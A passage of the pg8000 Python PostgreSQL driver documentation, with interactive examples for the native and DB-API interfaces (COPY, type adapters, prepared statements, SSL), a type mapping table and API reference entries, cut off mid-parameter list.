If the JSON you want to send is a `dict`\nthen you can just do:\n\n[source,python]\n----\n>>> val = {'name': 'Apollo 11 Cave', 'zebra': True, 'age': 26.003}\n>>> con.run(\"SELECT :apollo\", apollo=val)\n[[{'age': 26.003, 'name': 'Apollo 11 Cave', 'zebra': True}]]\n\n----\n\nJSON can always be sent in serialized form to the server:\n\n[source,python]\n----\n>>> import json\n>>>\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> con.run(\"SELECT CAST(:apollo as jsonb)\", apollo=json.dumps(val))\n[[['Apollo 11 Cave', True, 26.003]]]\n\n----\n\n\n=== Retrieve Column Metadata From Results\n\nFind the column metadata returned from a query:\n\n[source,python]\n----\n>>> con.run(\"create temporary table quark (id serial, name text)\")\n[]\n>>> for name in ('Up', 'Down'):\n... con.run(\"INSERT INTO quark (name) VALUES (:name)\", name=name)\n[]\n[]\n>>> # Now execute the query\n>>>\n>>> con.run(\"SELECT * FROM quark\")\n[[1, 'Up'], [2, 'Down']]\n>>>\n>>> # and retried the metadata\n>>>\n>>> con.columns\n[{'table_oid': ..., 'column_attrnum': 1, 'type_oid': 23, 'type_size': 4, 'type_modifier': -1, 'format': 0, 'name': 'id'}, {'table_oid': ..., 'column_attrnum': 2, 'type_oid': 25, 'type_size': -1, 'type_modifier': -1, 'format': 0, 'name': 'name'}]\n>>>\n>>> # Show just the column names\n>>>\n>>> [c['name'] for c in con.columns]\n['id', 'name']\n\n----\n\n\n=== Notices And Notifications\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> con.run(\"LISTEN aliens_landed\")\n[]\n>>> con.run(\"NOTIFY aliens_landed\")\n[]\n>>> # A notification is a tuple containing (backend_pid, channel, payload)\n>>>\n>>> con.notifications[0]\n(..., 'aliens_landed', '')\n\n----\n\n\n=== LIMIT ALL\n\nYou might think that the following would work, but in fact it fails:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim='ALL')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nInstead the https:\/\/www.postgresql.org\/docs\/current\/sql-select.html[docs say]\nthat you can send `null` as an alternative to `ALL`, which does work:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim=None)\n[['silo 1']]\n\n----\n\n\n=== IN and NOT IN\n\nYou might think that the following would work, but in fact the server doesn't\nlike it:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN :v\", v=('a', 'b'))\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\ninstead you can write it using the\nhttps:\/\/www.postgresql.org\/docs\/current\/functions-array.html[`unnest`]\nfunction:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN (SELECT unnest(:v))\", v=('a', 'b'))\n[['silo 1']]\n\n----\n\nand you can do the same for `NOT IN`.\n\n\n=== Many SQL Statements Can't Be Parameterized\n\nIn PostgreSQL parameters can only be used for\nhttps:\/\/www.postgresql.org\/docs\/current\/xfunc-sql.html#XFUNC-SQL-FUNCTION-ARGUMENTS[data values, not identifiers]. 
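Parameterizing a data value works as you'd expect (a quick sketch, reusing the
`con` connection from the earlier examples; the query is our own illustration):

[source,python]
----
>>> con.run("SELECT upper(:name)", name="juan")
[['JUAN']]

----
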
Sometimes this might not work as expected,\nfor example the following fails:\n\n[source,python]\n----\n>>> con.run(\"CREATE USER juan WITH PASSWORD :password\", password='quail')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nIt fails because the PostgreSQL server doesn't allow this statement to have\nany parameters. There are many SQL statements that one might think would have\nparameters, but don't.\n\n\n=== COPY from and to a file\n\nThe SQL https:\/\/www.postgresql.org\/docs\/current\/sql-copy.html[COPY] statement\ncan be used to copy from and to a file or file-like object. Here' an example\nusing the CSV format:\n\n[source,python]\n----\n\n>>> from io import BytesIO\n>>> import csv\n>>> import codecs\n>>>\n>>> # Create a CSV file in memory\n>>>\n>>> stream_in = BytesIO()\n>>> StreamWriter = codecs.getwriter('utf-8')\n>>> csv_writer = csv.writer(StreamWriter(stream_in))\n>>> csv_writer.writerow([1, \"electron\"])\n>>> csv_writer.writerow([2, \"muon\"])\n>>> csv_writer.writerow([3, \"tau\"])\n>>> stream_in.seek(0)\n0\n>>>\n>>> # Create a table and then copy the CSV into it\n>>>\n>>> con.run(\"CREATE TEMPORARY TABLE lepton (id SERIAL, name TEXT)\")\n[]\n>>> con.run(\"COPY lepton FROM STDIN WITH (FORMAT CSV)\", stream=stream_in)\n[]\n>>>\n>>> # COPY from a table to a stream\n>>>\n>>> stream_out = BytesIO()\n>>> con.run(\"COPY lepton TO STDOUT WITH (FORMAT CSV)\", stream=stream_out)\n[]\n>>> stream_out.seek(0)\n0\n>>> StreamReader = codecs.getreader('utf-8')\n>>> for row in csv.reader(StreamReader(stream_out)):\n... print(row)\n['1', 'electron']\n['2', 'muon']\n['3', 'tau']\n\n----\n\n\n=== Execute Multiple SQL Statements\n\nIf you want to execute a series of SQL statements (eg. an `.sql` file), you\ncan run them as expected:\n\n[source,python]\n----\n\n>>> statements = \"SELECT 5; SELECT 'Erich Fromm';\"\n>>>\n>>> con.run(statements)\n[[5], ['Erich Fromm']]\n\n----\n\nThe only caveat is that when executing multiple statements you can't have any\nparameters.\n\n\n=== Quoted Identifiers in SQL\n\nSay you had a column called `My Column`. Since it's case sensitive and\ncontains a space, you'd have to\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERSdouble[surround it by double quotes]. But you can't do:\n\n[source,python]\n----\n>>> con.run(\"select 'hello' as \"My Column\"\")\nTraceback (most recent call last):\nSyntaxError: invalid syntax\n\n----\n\nsince Python uses double quotes to delimit string literals, so one solution is\nto use Python's\nhttps:\/\/docs.python.org\/3\/tutorial\/introduction.html#strings[triple quotes]\nto delimit the string instead:\n\n[source,python]\n----\n>>> con.run('''select 'hello' as \"My Column\"''')\n[['hello']]\n\n----\n\n\n=== Custom adapter from a Python type to a PostgreSQL type\n\npg8000 has a mapping from Python types to PostgreSQL types for when it needs\nto send SQL parameters to the server. The default mapping that comes with\npg8000 is designed to work well in most cases, but you might want to add or\nreplace the default mapping.\n\nA Python `datetime.timedelta` object is sent to the server as a PostgreSQL\n`interval` type, which has the `oid` 1186. But let's say we wanted to create\nour own Python class to be sent as an `interval` type. Then we'd have to\nregister an adapter:\n\n[source,python]\n----\n\n>>> class MyInterval(str):\n... pass\n>>>\n>>> def my_interval_out(my_interval):\n... 
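...     # The text returned here is passed to the server as-is, so it must
...     # be in a format the server's interval parser accepts, e.g. '2 hours'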
...     return my_interval  # Must return a str
>>>
>>> con.register_out_adapter(MyInterval, 1186, my_interval_out)
>>> con.run("SELECT :interval", interval=MyInterval("2 hours"))
[[datetime.timedelta(seconds=7200)]]

----

Note that it still came back as a `datetime.timedelta` object because we only
changed the mapping from Python to PostgreSQL. See below for an example of how
to change the mapping from PostgreSQL to Python.


=== Custom adapter from a PostgreSQL type to a Python type

pg8000 has a mapping from PostgreSQL types to Python types for when it receives
SQL results from the server. The default mapping that comes with pg8000 is
designed to work well in most cases, but you might want to add or replace the
default mapping.

If pg8000 receives the PostgreSQL `interval` type, which has the `oid` 1186, it
converts it into a Python `datetime.timedelta` object. But let's say we wanted
to create our own Python class to be used instead of `datetime.timedelta`. Then
we'd have to register an adapter:


[source,python]
----

>>> class MyInterval(str):
...     pass
>>>
>>> def my_interval_in(my_interval_str):  # The parameter is of type str
...     return MyInterval(my_interval_str)
>>>
>>> con.register_in_adapter(1186, my_interval_in)
>>> con.run("SELECT CAST('2 years' AS interval)")
[['2 years']]

----

Note that registering the 'in' adapter only affects the mapping from the
PostgreSQL type to the Python type. See above for an example of how to change
the mapping from Python to PostgreSQL.


=== Could Not Determine Data Type Of Parameter

Sometimes you'll get the 'could not determine data type of parameter' error
message from the server:

[source,python]
----

>>> con.run("SELECT :v IS NULL", v=None)
Traceback (most recent call last):
pg8000.exceptions.DatabaseError: {'S': 'ERROR', 'V': 'ERROR', 'C': '42P18', 'M': 'could not determine data type of parameter $1', 'F': 'postgres.c', 'L': '...', 'R': 'exec_parse_message'}

----

One way of solving it is to put a `cast` in the SQL:

[source,python]
----

>>> con.run("SELECT cast(:v as TIMESTAMP) IS NULL", v=None)
[[True]]

----

Another way is to override the type that pg8000 sends along with each
parameter:

[source,python]
----

>>> con.run("SELECT :v IS NULL", v=None, types={'v': pg8000.native.TIMESTAMP})
[[True]]

----


=== Prepared Statements

https://www.postgresql.org/docs/current/sql-prepare.html[Prepared statements]
can be useful in improving performance when you have a statement that's
executed repeatedly.
Here's an example:\n\n\n[source,python]\n----\n\n>>> # Create the prepared statement\n>>> ps = con.prepare(\"SELECT cast(:v as varchar)\")\n>>>\n>>> # Exceute the statement repeatedly\n>>> ps.run(v=\"speedy\")\n[['speedy']]\n>>> ps.run(v=\"rapid\")\n[['rapid']]\n>>> ps.run(v=\"swift\")\n[['swift']]\n>>>\n>>> # Close the prepared statement, releasing resources on the server\n>>> ps.close()\n\n----\n\n\n=== Use Environment Variables As Connection Defaults\n\nYou might want to use the current user as the database username for example:\n\n[source,python]\n----\n\n>>> import pg8000\n>>> import getpass\n>>>\n>>> # Connect to the database with current user name\n>>> username = getpass.getuser()\n>>> connection = pg8000.native.Connection(username, password=\"cpsnow\")\n>>>\n>>> connection.run(\"SELECT 'pilau'\")\n[['pilau']]\n\n----\n\nor perhaps you may want to use some of the same\nhttps:\/\/www.postgresql.org\/docs\/current\/libpq-envars.html[environment variables\nthat libpq uses]:\n\n[source,python]\n----\n\n>>> import pg8000\n>>> from os import environ\n>>>\n>>> username = environ.get('PGUSER', 'postgres')\n>>> password = environ.get('PGPASSWORD', 'cpsnow')\n>>> host = environ.get('PGHOST', 'localhost')\n>>> port = environ.get('PGPORT', '5432')\n>>> database = environ.get('PGDATABASE')\n>>>\n>>> connection = pg8000.native.Connection(\n... username, password=password, host=host, port=port, database=database)\n>>>\n>>> connection.run(\"SELECT 'Mr Cairo'\")\n[['Mr Cairo']]\n\n----\n\nIt might be asked, why doesn't pg8000 have this behaviour built in? The\nthinking follows the second aphorism of\nhttps:\/\/www.python.org\/dev\/peps\/pep-0020\/[The Zen of Python]:\n\n[quote]\nExplicit is better than implicit.\n\nSo we've taken the approach of only being able to set connection parameters\nusing the `pg8000.native.Connection()` constructor.\n\n\n=== Connect To PostgreSQL Over SSL\n\nTo connect to the server using SSL defaults do:\n\n[source,python]\n----\n\nimport pg8000.native\n\n\nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=True)\nconnection.run(\"SELECT 'The game is afoot!'\")\n\n----\n\nTo connect over SSL with custom settings, set the `ssl_context` parameter to\nan https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\nobject:\n\n[source,python]\n----\n\nimport pg8000.native\nimport ssl\n\n\nssl_context = ssl.SSLContext()\nssl_context.verify_mode = ssl.CERT_REQUIRED\nssl_context.load_verify_locations('root.pem') \nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=ssl_context)\n\n----\n\nIt may be that your PostgreSQL server is behind an SSL proxy server in which\ncase you can set a pg8000-specific attribute\n`ssl.SSLContext.request_ssl = False` which tells pg8000 to connect using an\nSSL socket, but not to request SSL from the PostgreSQL server:\n\n[source,python]\n----\n\nimport pg8000.native\nimport ssl\n\n\nssl_context = ssl.SSLContext()\nssl_context.request_ssl = False\nconnection = pg8000.native.Connection(\n username, password=\"cpsnow\", ssl_context=ssl_context)\n\n----\n\n\n== DB-API 2 Interactive Examples\n\nThese examples stick to the DB-API 2.0 standard.\n\n\n=== Basic Example\n\nImport pg8000, connect to the database, create a table, add some rows and then\nquery the table:\n\n[source,python]\n----\n>>> import pg8000\n>>>\n>>> conn = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\n>>> cursor = conn.cursor()\n>>> cursor.execute(\"CREATE TEMPORARY TABLE book (id SERIAL, 
title TEXT)")
>>> cursor.execute(
...     "INSERT INTO book (title) VALUES (%s), (%s) RETURNING id, title",
...     ("Ender's Game", "Speaker for the Dead"))
>>> results = cursor.fetchall()
>>> for row in results:
...     id, title = row
...     print("id = %s, title = %s" % (id, title))
id = 1, title = Ender's Game
id = 2, title = Speaker for the Dead
>>> conn.commit()

----


=== Query Using Functions

Another query, using some PostgreSQL functions:

[source,python]
----
>>> cursor.execute("SELECT extract(millennium from now())")
>>> cursor.fetchone()
[3.0]

----


=== Interval Type

A query that returns the PostgreSQL interval type:

[source,python]
----
>>> import datetime
>>> cursor.execute("SELECT timestamp '2013-12-01 16:06' - %s",
...     (datetime.date(1980, 4, 27),))
>>> cursor.fetchone()
[datetime.timedelta(days=12271, seconds=57960)]

----


=== Point Type

A round-trip with a
https://www.postgresql.org/docs/current/datatype-geometric.html[PostgreSQL
point] type:

[source,python]
----
>>> cursor.execute("SELECT cast(%s as point)", ('(2.3,1)',))
>>> cursor.fetchone()
['(2.3,1)']

----


=== Numeric Parameter Style

pg8000 supports all the DB-API parameter styles. Here's an example of using
the 'numeric' parameter style:

[source,python]
----
>>> pg8000.dbapi.paramstyle = "numeric"
>>> cursor = conn.cursor()
>>> cursor.execute("SELECT array_prepend(:1, :2)", (500, [1, 2, 3, 4]))
>>> cursor.fetchone()
[[500, 1, 2, 3, 4]]
>>> pg8000.dbapi.paramstyle = "format"
>>> conn.rollback()

----


=== Autocommit

Following the DB-API specification, autocommit is off by default. It can be
turned on by using the autocommit property of the connection.

[source,python]
----
>>> conn.autocommit = True
>>> cur = conn.cursor()
>>> cur.execute("vacuum")
>>> conn.autocommit = False
>>> cur.close()

----


=== Client Encoding

When communicating with the server, pg8000 uses the character set that the
server asks it to use (the client encoding). By default the client encoding is
the database's character set (chosen when the database is created), but the
client encoding can be changed in a number of ways (eg. setting
CLIENT_ENCODING in postgresql.conf). Another way of changing the client
encoding is by using an SQL command. For example:

[source,python]
----
>>> cur = conn.cursor()
>>> cur.execute("SET CLIENT_ENCODING TO 'UTF8'")
>>> cur.execute("SHOW CLIENT_ENCODING")
>>> cur.fetchone()
['UTF8']
>>> cur.close()

----


=== JSON

JSON is sent to the server serialized, and returned de-serialized.
Here's an\nexample:\n\n[source,python]\n----\n>>> import json\n>>> cur = conn.cursor()\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> cur.execute(\"SELECT cast(%s as json)\", (json.dumps(val),))\n>>> cur.fetchone()\n[['Apollo 11 Cave', True, 26.003]]\n>>> cur.close()\n\n----\n\n\n=== Retrieve Column Names From Results\n\nUse the columns names retrieved from a query:\n\n[source,python]\n----\n>>> import pg8000\n>>> conn = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\n>>> c = conn.cursor()\n>>> c.execute(\"create temporary table quark (id serial, name text)\")\n>>> c.executemany(\"INSERT INTO quark (name) VALUES (%s)\", ((\"Up\",), (\"Down\",)))\n>>> #\n>>> # Now retrieve the results\n>>> #\n>>> c.execute(\"select * from quark\")\n>>> rows = c.fetchall()\n>>> keys = [k[0] for k in c.description]\n>>> results = [dict(zip(keys, row)) for row in rows]\n>>> assert results == [{'id': 1, 'name': 'Up'}, {'id': 2, 'name': 'Down'}]\n\n----\n\n\n=== Notices\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> cur = conn.cursor()\n>>> cur.execute(\"LISTEN aliens_landed\")\n>>> cur.execute(\"NOTIFY aliens_landed\")\n>>> conn.commit()\n>>> conn.notifications[0][1]\n'aliens_landed'\n\n----\n\n\n=== COPY from and to a file\n\nThe SQL https:\/\/www.postgresql.org\/docs\/current\/sql-copy.html[COPY] statement\ncan be used to copy from and to a file or file-like object:\n\n[source,python]\n----\n\n>>> from io import BytesIO\n>>> #\n>>> # COPY from a stream to a table\n>>> #\n>>> stream_in = BytesIO(b'1\\telectron\\n2\\tmuon\\n3\\ttau\\n')\n>>> cur = conn.cursor()\n>>> cur.execute(\"create temporary table lepton (id serial, name text)\")\n>>> cur.execute(\"COPY lepton FROM stdin\", stream=stream_in)\n>>> #\n>>> # Now COPY from a table to a stream\n>>> #\n>>> stream_out = BytesIO()\n>>> cur.execute(\"copy lepton to stdout\", stream=stream_out)\n>>> stream_out.getvalue()\nb'1\\telectron\\n2\\tmuon\\n3\\ttau\\n'\n\n----\n\n\n== Type Mapping\n\nThe following table shows the default mapping between Python types and\nPostgreSQL types, and vice versa.\n\nIf pg8000 doesn't recognize a type that it receives from PostgreSQL, it will\nreturn it as a `str` type. This is how pg8000 handles PostgreSQL `enum` and\nXML types. 
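For instance (a sketch of our own, reusing the native `con` from the earlier
examples), an XML value comes back as a plain string:

[source,python]
----
>>> con.run("SELECT XMLPARSE(DOCUMENT '<quark>Up</quark>')")
[['<quark>Up</quark>']]

----
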
It's possible to change the default mapping using adapters (see the\nexamples).\n\n.Python to PostgreSQL Type Mapping\n|===\n| Python Type | PostgreSQL Type | Notes\n\n| bool\n| bool\n|\n\n| int\n| int4\n|\n\n| str\n| text\n|\n\n| float\n| float8\n|\n\n| decimal.Decimal\n| numeric\n|\n\n| bytes\n| bytea\n|\n\n| datetime.datetime (without tzinfo)\n| timestamp without timezone\n| See note below.\n\n| datetime.datetime (with tzinfo)\n| timestamp with timezone\n| See note below.\n\n| datetime.date\n| date\n| See note below.\n\n| datetime.time\n| time without time zone\n|\n\n| datetime.timedelta\n| interval\n|\n\n| None\n| NULL\n|\n\n| uuid.UUID\n| uuid\n|\n\n| ipaddress.IPv4Address\n| inet\n|\n\n| ipaddress.IPv6Address\n| inet\n|\n\n| ipaddress.IPv4Network\n| inet\n|\n\n| ipaddress.IPv6Network\n| inet\n|\n\n| int\n| xid\n|\n\n| list of int\n| INT4[]\n|\n\n| list of float\n| FLOAT8[]\n|\n\n| list of bool\n| BOOL[]\n|\n\n| list of str\n| TEXT[]\n|\n\n| int\n| int2vector\n| Only from PostgreSQL to Python\n\n| JSON\n| json, jsonb\n| The Python JSON is provided as a Python serialized string. Results returned\n as de-serialized JSON.\n|===\n\n\n[[_theory_of_operation]]\n== Theory Of Operation\n\n{empty} +\n\n[quote, Jochen Liedtke, Liedtke's minimality principle]\n____\nA concept is tolerated inside the microkernel only if moving it outside the\nkernel, i.e., permitting competing implementations, would prevent the\nimplementation of the system's required functionality.\n____\n\n\npg8000 is designed to be used with one thread per connection.\n\nPg8000 communicates with the database using the\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/protocol.html[PostgreSQL\nFrontend\/Backend Protocol] (FEBE). By default, pg8000 uses unnamed prepared\nstatements. It uses the Extended Query feature of the FEBE. So the steps are:\n\n. Query comes in.\n. Send a PARSE message to the server to create an unnamed prepared statement.\n. Send a BIND message to run against the unnamed prepared statement, resulting\n in an unnamed portal on the server.\n. Send an EXECUTE message to read all the results from the portal.\n\nIt's also possible to use named prepared statements. In which case the\nprepared statement persists on the server, and represented in pg8000 using a\nPreparedStatement object. This means that the PARSE step gets executed once up\nfront, and then only the BIND and EXECUTE steps are repeated subsequently.\n\nThere are a lot of PostgreSQL data types, but few primitive data types in\nPython. A PostgreSQL data type has to be assigned to each query parameter,\nwhich is impossible to work out in all cases. In these cases an adapter can be\nused for the parameter to indicate its type, or sometimes an\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-expressions.html#SQL-SYNTAX-TYPE-CASTS[explicit cast] can be used in the SQL.\n\nIn the FEBE protocol, each query parameter can be sent to the server either as\nbinary or text according to the format code. In pg8000 the parameters are\nalways sent as text.\n\n* PostgreSQL has +\/-infinity values for dates and timestamps, but Python does\n not. Pg8000 handles this by returning +\/-infinity strings in results, and in\n parameters the strings +\/- infinity can be used.\n\n* PostgreSQL dates\/timestamps can have values outside the range of Python\n datetimes. 
These are handled using the underlying PostgreSQL storage method.\n I don't know of any users of pg8000 that use this feature, so get in touch if\n it affects you.\n\n* Occasionally, the network connection between pg8000 and the server may go\n down. If pg8000 encounters a network problem it'll raise an `InterfaceError`\n with an error message starting with `network error` and with the original\n exception set as the\n https:\/\/docs.python.org\/3\/reference\/simple_stmts.html#the-raise-statement[cause].\n\n\n== Native API Docs\n\n=== pg8000.native.Connection(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)\n\nCreates a connection to a PostgreSQL database.\n\nuser::\n The username to connect to the PostgreSQL server with. If your server\n character encoding is not `ascii` or `utf8`, then you need to provide\n `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.\n\nhost::\n The hostname of the PostgreSQL server to connect with. Providing this\n parameter is necessary for TCP\/IP connections. One of either `host` or\n `unix_sock` must be provided. The default is `localhost`.\n\ndatabase::\n The name of the database instance to connect with. If `None` then the\n PostgreSQL server will assume the database name is the same as the username.\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.\n\nport::\n The TCP\/IP port of the PostgreSQL server instance. This parameter defaults\n to `5432`, the registered common port of PostgreSQL TCP\/IP servers.\n\npassword::\n The user password to connect to the server with. This parameter is optional;\n if omitted and the database server requests password-based authentication,\n the connection will fail to open. If this parameter is provided but not\n requested by the server, no error will occur. +\n +\n If your server character encoding is not `ascii` or `utf8`, then\n you need to provide `password` as bytes, eg.\n `'my_password'.encode('EUC-JP')`.\n\n\nsource_address::\n The source IP address which initiates the connection to the PostgreSQL server.\n The default is `None` which means that the operating system will choose the\n source address.\n\nunix_sock::\n The path to the UNIX socket to access the database through, for example,\n `'\/tmp\/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.\n\nssl_context::\n This governs SSL encryption for TCP\/IP sockets. It can have three values:\n * `None`, meaning no SSL (the default)\n * `True`, means use SSL with an\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n created using\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]\n * An instance of\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n which will be used to create the SSL connection. +\n +\n If your PostgreSQL server is behind an SSL proxy, you can set the\n pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which\n tells pg8000 to use an SSL socket, but not to request SSL from the\n PostgreSQL server. Note that this means you can't use SCRAM\n authentication with channel binding.\n\ntimeout::\n This is the time in seconds before the connection to the server will time\n out. 
The default is `None` which means no timeout.\n\ntcp_keepalive::\n If `True` then use\n https:\/\/en.wikipedia.org\/wiki\/Keepalive#TCP_keepalive[TCP keepalive]. The\n default is `True`.\n\napplication_name::\n Sets the https:\/\/www.postgresql.org\/docs\/current\/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name]. If your server character encoding is not\n `ascii` or `utf8`, then you need to provide values as bytes, eg.\n `'my_application_name'.encode('EUC-JP')`. The default is `None` which means\n that the server will set the application name.\n\nreplication::\n Used to run in https:\/\/www.postgresql.org\/docs\/12\/protocol-replication.html[streaming replication mode].\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide values as bytes, eg. `'database'.encode('EUC-JP')`.\n\n\n=== pg8000.native.Error\n\nGeneric exception that is the base exception of the other error exceptions.\n\n\n=== pg8000.native.InterfaceError\n\nFor errors that originate within pg8000.\n\n\n=== pg8000.native.DatabaseError\n\nFor errors that originate from the server.\n\n=== pg8000.native.Connection.notifications\n\nA deque of server-side\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-notify.html[notifications] received\nby this database connection (via the LISTEN \/ NOTIFY PostgreSQL commands). Each\nlist item is a three-element tuple containing the PostgreSQL backend PID that\nissued the notify, the channel and the payload.\n\n\n=== pg8000.native.Connection.notices\n\nA deque of server-side notices received by this database connection.\n\n\n=== pg8000.native.Connection.parameter_statuses\n\nA deque of server-side parameter statuses received by this database connection.\n\n\n=== pg8000.native.Connection.run(sql, stream=None, types=None, **kwargs)\n\nExecutes an sql statement, and returns the results as a `list`. For example:\n\n`con.run(\"SELECT * FROM cities where population > :pop\", pop=10000)`\n\nsql::\n The SQL statement to execute. Parameter placeholders appear as a `:` followed\n by the parameter name.\n\nstream::\n For use with the PostgreSQL\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/sql-copy.html[COPY] command. For\na `COPY FROM` the parameter must be a readable file-like object, and for\n`COPY TO` it must be writable.\n\ntypes::\n A dictionary of oids. A key corresponds to a parameter. \n\nkwargs::\n The parameters of the SQL statement.\n\n\n=== pg8000.native.Connection.row_count\n\nThis read-only attribute contains the number of rows that the last `run()`\nmethod produced (for query statements like `SELECT`) or affected (for\nmodification statements like `UPDATE`.\n\nThe value is -1 if:\n\n* No `run()` method has been performed yet.\n* There was no rowcount associated with the last `run()`.\n* Using a `SELECT` query statement on a PostgreSQL server older than version\n 9.\n* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.\n\n\n=== pg8000.native.Connection.columns\n\nA list of column metadata. 
Each item in the list is a dictionary with the
following keys:

* name
* table_oid
* column_attrnum
* type_oid
* type_size
* type_modifier
* format


=== pg8000.native.Connection.close()

Closes the database connection.


=== pg8000.native.Connection.register_out_adapter(typ, oid, out_func)

Register a type adapter for types going out from pg8000 to the server.

typ::
  The Python class that the adapter is for.

oid::
  The PostgreSQL type identifier found in the
  https://www.postgresql.org/docs/current/catalog-pg-type.html[pg_type system
  catalog].

out_func::
  A function that takes the Python object and returns its string representation
  in the format that the server requires.


=== pg8000.native.Connection.register_in_adapter(oid, in_func)

Register a type adapter for types coming in from the server to pg8000.

oid::
  The PostgreSQL type identifier found in the
  https://www.postgresql.org/docs/current/catalog-pg-type.html[pg_type system
  catalog].

in_func::
  A function that takes the PostgreSQL string representation and returns
  a corresponding Python object.


=== pg8000.native.Connection.prepare(sql)

Returns a PreparedStatement object which represents a
https://www.postgresql.org/docs/current/sql-prepare.html[prepared statement] on
the server. It can subsequently be repeatedly executed as shown in the
<<_prepared_statements, example>>.

sql::
  The SQL statement to prepare. Parameter placeholders appear as a `:` followed
  by the parameter name.


=== pg8000.native.PreparedStatement

A prepared statement object is returned by the
`pg8000.native.Connection.prepare()` method of a connection. It has the
following methods:


=== pg8000.native.PreparedStatement.run(**kwargs)

Executes the prepared statement, and returns the results as a `tuple`.

kwargs::
  The parameters of the prepared statement.


=== pg8000.native.PreparedStatement.close()

Closes the prepared statement, releasing the prepared statement held on the
server.


== DB-API 2 Docs


=== Properties


==== pg8000.dbapi.apilevel

The DBAPI level supported, currently "2.0".

This property is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.threadsafety

Integer constant stating the level of thread safety the DBAPI interface
supports. For pg8000, the threadsafety value is 1, meaning that threads may
share the module but not connections.

This property is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

==== pg8000.dbapi.paramstyle

String property stating the type of parameter marker formatting expected by
the interface. This value defaults to "format", in which parameters are
marked in this format: "WHERE name=%s".

This property is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

As an extension to the DBAPI specification, this value is not constant; it
can be changed to any of the following values:

qmark::
  Question mark style, eg. `WHERE name=?`

numeric::
  Numeric positional style, eg. `WHERE name=:1`

named::
  Named style, eg. `WHERE name=:paramname`

format::
  printf format codes, eg. `WHERE name=%s`

pyformat::
  Python format codes, eg.
`WHERE name=%(paramname)s`\n\n\n==== pg8000.dbapi.STRING\n\nString type oid.\n\n==== pg8000.dbapi.BINARY\n\n\n==== pg8000.dbapi.NUMBER\n\nNumeric type oid.\n\n\n==== pg8000.dbapi.DATETIME\n\nTimestamp type oid\n\n\n==== pg8000.dbapi.ROWID\n\nROWID type oid\n\n\n=== Functions\n\n==== pg8000.dbapi.connect(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)\n\nCreates a connection to a PostgreSQL database.\n\nThis property is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nuser::\n The username to connect to the PostgreSQL server with. If your server\n character encoding is not `ascii` or `utf8`, then you need to provide\n `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.\n\nhost::\n The hostname of the PostgreSQL server to connect with. Providing this\n parameter is necessary for TCP\/IP connections. One of either `host` or\n `unix_sock` must be provided. The default is `localhost`.\n\ndatabase::\n The name of the database instance to connect with. If `None` then the\n PostgreSQL server will assume the database name is the same as the username.\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.\n\nport::\n The TCP\/IP port of the PostgreSQL server instance. This parameter defaults\n to `5432`, the registered common port of PostgreSQL TCP\/IP servers.\n\npassword::\n The user password to connect to the server with. This parameter is optional;\n if omitted and the database server requests password-based authentication,\n the connection will fail to open. If this parameter is provided but not\n requested by the server, no error will occur. +\n +\n If your server character encoding is not `ascii` or `utf8`, then\n you need to provide `password` as bytes, eg.\n `'my_password'.encode('EUC-JP')`.\n\n\nsource_address::\n The source IP address which initiates the connection to the PostgreSQL server.\n The default is 